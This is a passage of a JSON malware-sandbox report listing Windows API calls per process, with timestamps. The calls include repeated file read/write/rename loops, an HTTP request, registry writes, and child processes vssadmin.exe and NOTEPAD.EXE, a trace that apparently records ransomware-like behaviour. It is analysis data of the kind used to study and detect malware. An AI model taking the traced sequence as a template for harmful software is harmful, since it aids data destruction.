"timestamp": "2016-02-16 17:42:07,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:07,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,269", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:07,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,309", "api": "NtFreeVirtualMemory"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,319", "api": "InternetConnectA"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,319", "api": "HttpOpenRequestA"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": "HttpSendRequestA"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": "InternetReadFile"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": 
"InternetCloseHandle"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": "InternetCloseHandle"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": 
"NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "threading", "timestamp": "2016-02-16 17:42:07,659", "api": "ExitThread"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "FindFirstFileExW"}, {"category": "process", 
"timestamp": "2016-02-16 17:42:07,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,689", "api": "NtWriteFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "NtFreeVirtualMemory"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,699", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,699", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,699", "api": "RegSetValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,699", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,699", "api": "NtQueryInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,790", "api": "ShellExecuteExW"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,870", "api": "ShellExecuteExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,870", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,870", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,870", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,870", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,870", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,870", "api": "MoveFileWithProgressW"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,940", "api": "CreateProcessInternalW"}]}, {"parent_id": 1592, "process_name": "vssadmin.exe", "process_id": 1840, 
"first_seen": "2016-02-16 17:41:36,314", "calls": [{"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryValueKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,314", "api": "LdrGetDllHandle"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "LdrGetDllHandle"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", 
"api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "LdrGetDllHandle"}, {"category": "process", "timestamp": "2016-02-16 17:41:36,324", "api": "ExitProcess"}]}, {"parent_id": 1592, "process_name": "NOTEPAD.EXE", "process_id": 592, "first_seen": "2016-02-16 17:42:07,850", "calls": [{"category": "misc", "timestamp": "2016-02-16 17:42:07,900", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,900", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:07,900", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 
17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, 
{"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,920", "api": "LdrLoadDll"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:07,920", "api": "NtCreateMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,920", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,920", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "SetWindowsHookExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "SetWindowsHookExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,990", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,990", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,990", "api": 
"ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,000", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "ZwMapViewOfSection"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegOpenKeyExW"}, {"category": 
"registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", 
"timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,010", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,010", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,010", 
"api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,020", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,020", "api": "LdrGetDllHandle"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,020", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,020", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,020", "api": "GetSystemMetrics"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,020", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,020", "api": "NtQueryInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,020", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,030", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,030", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", 
"timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": 